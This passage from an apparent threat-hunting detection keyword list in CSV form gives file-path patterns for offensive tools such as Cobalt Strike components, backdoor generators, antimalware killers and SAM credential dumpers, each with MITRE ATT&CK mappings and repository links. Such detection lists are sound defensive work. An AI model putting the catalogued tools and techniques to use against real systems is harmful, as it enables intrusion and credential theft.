?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/B374K*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*/BabelStrike.git*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*/BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*/BackDoor*","offensive_tool_keyword","_","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/backdoor.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/backdoor/traitor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/backdoor_all_users.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/backdoor_apk*","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8269","2217","2023-06-11T19:16:05Z","2016-07-24T10:30:19Z" +"*/backoff.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 
is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/backorifice-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/backorifice-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Backstab.git","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*/Backstab/Backstab*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*/backstab_src/*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*/BackupOperatorToDA.git*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*/BackupPrivSam/*","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"*/bacnet-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/BadZure.git*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*/BadZure/*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","1","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*/banner.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/BaseNEncoder.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/bash_completion.d/exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/bash_executor/*.go","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/bashexplode/boko*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*/Bashfuscator*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/Bashfuscator/Bashfuscator","1","1","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" +"*/Bates.csproj*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/batik_svg*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/bazarloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/bbaranoff/CVE-2022-0847/*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" 
+"*/beacon.h","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"*/beacon_202_no_acl.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/beacon_257-objects.log*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - 
TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/beacon_compatibility*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*/beacon_compatibility.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*/beacon_funcs/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/beacon_health_check/*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" +"*/beacon_http/*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/beacon_notify.cna*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/BeaconChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/beaconhealth.cna*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" +"*/beacon-injection/*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
